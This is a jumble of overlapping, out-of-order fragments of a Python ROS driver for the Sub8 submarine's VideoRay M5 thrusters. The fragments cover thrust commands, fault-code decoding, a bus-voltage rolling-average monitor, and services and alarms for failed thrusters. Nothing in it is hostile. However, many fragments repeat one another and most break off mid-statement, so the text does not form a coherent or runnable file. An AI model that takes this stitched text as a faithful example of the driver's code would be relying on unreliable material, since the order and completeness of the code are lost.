"reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1)",
"thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def",
"# If someone else cleared this alarm, we need to make sure to",
"rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still be true - David)",
"each thruster If there are any updates to the list of failed thrusters,",
"faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are:",
"of failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) >",
"window_duration - float (amount of seconds for which to keep a reading in",
"voltage in buffer ''' voltages = [] if len(self.buffer) == 0: return None",
"bus voltage. As of May 2017, this is just a simple rolling average",
"Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse,",
"command (in Newtons) to a named thruster Example names are BLR, FLH, etc.",
"thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) #",
"bus voltage if enough time has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD:",
"commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model =",
"__init__(self, voltage, time): self.v = voltage self.t = time def __init__(self, window_duration): '''",
"FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock =",
"the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster",
"srv): ''' Get the thruster info for a particular thruster name ''' query_name",
"if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' +",
"failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all",
"in buffer ''' voltages = [] if len(self.buffer) == 0: return None for",
"to a named thruster Example names are BLR, FLH, etc. Raises RuntimeError if",
"port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to take effect def get_thruster_info(self,",
"import rosparam import threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import",
"parameter accordingly Sets the severity to the number of failed thrusters (clipped at",
"a thruster that is offline is commanded a non-zero thrust ''' port_name =",
"appropriate port/thruster - Send a thruster status message describing the status of the",
"# To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster',",
"{} # ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack =",
"to offline thruster (' + name + ')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We",
"self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try to do anything if",
"rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than",
"(thruster mapper blocks until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo,",
"else cleared this alarm, we need to make sure to raise it again",
"args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter))",
"and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the thruster",
"for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) #",
"with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some",
"voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough time",
"failed thrusters, it will raise and alarm ''' failed_before = {x for x",
"= thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {}",
"thruster info for a particular thruster name ''' query_name = srv.thruster_name info =",
"thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to the thruster dict and configure",
"problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity",
"import rospy import rospkg import rosparam import threading import argparse from geometry_msgs.msg import",
"publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are",
"header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage",
"= threading.Lock() class BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage. As",
"makes sense (the M5's will give nonsense feedback at times) if voltage >=",
"thruster comms port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info,",
"check bus voltage if enough time has passed if rospy.Time.now() - self.last_estimate_time >",
"Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create",
"online # Don't try to do anything if the thruster status is bad",
"from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster",
"if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm(",
"= float(voltage) # Only add if it makes sense (the M5's will give",
"clear 'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def",
"parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver",
"alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): ''' Raises or clears the",
"time def __init__(self, window_duration): ''' window_duration - float (amount of seconds for which",
"self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings",
"0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster (' + name + ')')",
"managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference",
"try to do anything if the thruster status is bad if thruster_status is",
"Raise or clear 'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters)",
"Makes a thruster unavailable for thrust allocation ''' # So that thrust is",
"thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()),",
"feedback at times) if voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time))",
"the thruster info for a particular thruster name ''' query_name = srv.thruster_name info",
"float(voltage) # Only add if it makes sense (the M5's will give nonsense",
"self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the window_duration from buffer '''",
"''' Class that estimates sub8's thruster bus voltage. As of May 2017, this",
"key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id,",
"methods are left for when smarter filtering is needed ''' VMAX = 50",
"ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake",
"''' Loads a dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort objects",
"thrust bounds is commanded Raises UnavailableThrusterException if a thruster that is offline is",
"port/thruster - Send a thruster status message describing the status of the particular",
") ) # Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now())",
"and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None:",
"thruster_info def check_alarm_status(self, alarm): # If someone else cleared this alarm, we need",
"sub's thrusters - Gather configuration data and make it available to other nodes",
"in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS",
"thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and raise alarm if necessary",
"> 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names':",
"this service to be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus",
"thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be set before launching the",
"else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id =",
"= self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name +",
"with thrusters - Track a thrust_dict, which maps thruster names to the appropriate",
"rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults))",
"thrust_dict, which maps thruster names to the appropriate port - Given a command",
"is offline is commanded a non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port =",
"need to make sure to raise it again if not alarm.raised and alarm.node_name",
"[] if len(self.buffer) == 0: return None for r in self.buffer: voltages.append(r.v) return",
"effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort)",
"_NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding",
"argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import",
"thrust allocation ''' # So that thrust is not allocated to the thruster",
"30.0 # s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an",
"self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml')",
"if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on parameter '/simulate'\") # Instantiate",
"thrusters, it will raise and alarm ''' failed_before = {x for x in",
"thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort",
"with a constant width sliding window. However add_reading and get_estimate methods are left",
"messages contain a list of instructions, one for each thruster If there are",
"= int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items(): if code &",
"import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): '''",
"parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs",
"present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names:",
"_dropped_timeout = 1.0 # s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name()",
"(1 << 4): 'STALL', (1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults",
"the thruster status is bad if thruster_status is None: return message_contents = [",
"'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP',",
"name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline",
"0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3):",
"this is just a simple rolling average with a constant width sliding window.",
"that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes",
"alarm, we need to make sure to raise it again if not alarm.raised",
"by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks until",
"def get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages = [] if",
"def __init__(self, voltage, time): self.v = voltage self.t = time def __init__(self, window_duration):",
"3 if bus_voltage < self.kill_voltage: severity = 5 if severity is not None",
"thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't come back online even if comms",
"bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity",
"= self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage",
"geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus",
"''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust <",
"0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable for thrust allocation '''",
"thrusters\" desc_msg = \"Specify a path to the configuration.json file containing the thrust",
"None if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage: severity",
"However add_reading and get_estimate methods are left for when smarter filtering is needed",
"UnavailableThrusterException if a thruster that is offline is commanded a non-zero thrust '''",
"# Prevent outside interference # Create ThrusterPort objects in a dict indexed by",
"self.update_thruster_out_alarm() return {} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name)",
"fault_codes = { (1 << 0): 'UNDERVOLT', (1 << 1): 'OVERRVOLT', (1 <<",
"the number of failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if",
"if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer",
"= 50 # volts VMIN = 0 # volts class VoltageReading(object): def __init__(self,",
"'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args = {key: thruster_status[key]",
"= self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or",
"particular thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse(",
"{} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port =",
"return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to",
"'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN',",
"self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects '''",
"thrusters ''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def",
"if (failed in target_port.get_declared_thruster_names() and failed not in offline_on_port and failed not in",
"node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): # If",
"wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import",
"message_keyword_args = {key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i']",
"if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity",
"to all thrusters ''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name,",
"failed thrusters (clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0:",
"rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None:",
"= rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity",
"= \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify a path to",
"the status of the particular thruster ''' self.failed_thrusters = set() # This is",
") return thruster_info def check_alarm_status(self, alarm): # If someone else cleared this alarm,",
"came online # Don't try to do anything if the thruster status is",
"for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or",
"thrust to all thrusters ''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy():",
"rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions):",
"will raise and alarm ''' failed_before = {x for x in self.failed_thrusters} for",
"FLH, etc. Raises RuntimeError if a thrust value outside of the configured thrust",
"indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks",
"if severity is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has",
"bus_voltage estimate and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage",
"self.thruster_to_port_map.keys()} # These alarms require this service to be available before things will",
"will not come back online even if comms are good (user managed) #",
"buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\",",
"thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self,",
"Instantiate thruster comms port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] =",
"estimate and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is",
"return thruster_info def check_alarm_status(self, alarm): # If someone else cleared this alarm, we",
"reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in",
"node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish bus_voltage and raise",
"(user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside",
"specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings to",
"self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm",
"is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count',",
"thrust value outside of the configured thrust bounds is commanded Raises UnavailableThrusterException if",
"of seconds for which to keep a reading in the buffer) ''' self.bus_voltage_alarm",
"outside interference # Create ThrusterPort objects in a dict indexed by port name",
"Removes readings older than the window_duration from buffer ''' for reading in self.buffer:",
"list of failed thrusters, it will raise and alarm ''' failed_before = {x",
"self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg",
"def thrust_cb(self, msg): ''' Callback for receiving thrust commands These messages contain a",
"+ '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name,",
"command thrust ({}) outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name",
"(1 << 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1",
"self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage",
"def check_alarm_status(self, alarm): # If someone else cleared this alarm, we need to",
"self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects in a dict",
"severity to the number of failed thrusters (clipped at 5) ''' offline_names =",
"come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper",
"for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if",
"target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status = target_port.command_thruster(name, effort) # Keep",
"(1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN', }",
"rospy.logwarn('Tried to command thrust ({}) outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds))",
"# s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object",
"raise and alarm ''' failed_before = {x for x in self.failed_thrusters} for thrust_cmd",
"stop(self): ''' Commands 0 thrust to all thrusters ''' for port in self.ports.values():",
"unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {}",
"to buffer ''' voltage = float(voltage) # Only add if it makes sense",
"thrusters for simulation, based on parameter '/simulate'\") # Instantiate thruster comms port for",
"= self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info",
"ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters",
"load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports = {}",
"thruster ''' self.failed_thrusters = set() # This is only determined by comms self.deactivated_thrusters",
"def add_reading(self, voltage, time): ''' Adds voltage readings to buffer ''' voltage =",
"in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online #",
"thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0])",
"self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks until it can use",
"will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters",
"''' self.failed_thrusters = set() # This is only determined by comms self.deactivated_thrusters =",
"2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5):",
"{x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise",
"'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items():",
"- self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the",
"python import numpy as np import copy import rospy import rospkg import rosparam",
"thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust, 0):",
"= rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for",
"simple rolling average with a constant width sliding window. However add_reading and get_estimate",
"status is bad if thruster_status is None: return message_contents = [ 'rpm', 'bus_v',",
"self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort",
"False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on parameter '/simulate'\") #",
"self.prune_buffer() # check bus voltage if enough time has passed if rospy.Time.now() -",
"= AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects",
"(clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME,",
"- Gather configuration data and make it available to other nodes - Instantiate",
"= (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified",
"dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper",
"'/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path))",
"srv): ''' Makes a thruster unavailable for thrust allocation ''' # So that",
"thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) #",
"')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status = target_port.command_thruster(name,",
"self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough time has passed",
"''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None",
"dict and configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if",
"file containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:])",
"smarter filtering is needed ''' VMAX = 50 # volts VMIN = 0",
"status of the particular thruster ''' self.failed_thrusters = set() # This is only",
"add_reading(self, voltage, time): ''' Adds voltage readings to buffer ''' voltage = float(voltage)",
"thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't",
"rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all thrusters",
"is bad if thruster_status is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i',",
"import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster,",
"queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require this service to be",
"'__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg",
"def stop(self): ''' Commands 0 thrust to all thrusters ''' for port in",
"# Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt",
"if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still be",
"Sets the severity to the number of failed thrusters (clipped at 5) '''",
"port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add",
"import threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64",
"copy import rospy import rospkg import rosparam import threading import argparse from geometry_msgs.msg",
"sub8's thruster bus voltage. As of May 2017, this is just a simple",
"to be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor",
"# Add the thrusters to the thruster dict and configure if present for",
"a list of instructions, one for each thruster If there are any updates",
"voltage, time): self.v = voltage self.t = time def __init__(self, window_duration): ''' window_duration",
"check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm if necessary ''' bus_voltage =",
"self.t = time def __init__(self, window_duration): ''' window_duration - float (amount of seconds",
"commanding all of the sub's thrusters - Gather configuration data and make it",
"self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will",
"Only add if it makes sense (the M5's will give nonsense feedback at",
">= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage",
"in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try to do anything",
"faults = [] for code, fault_name in fault_codes.items(): if code & fault !=",
"are BLR, FLH, etc. Raises RuntimeError if a thrust value outside of the",
"the configuration.json file containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args",
"= rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster',",
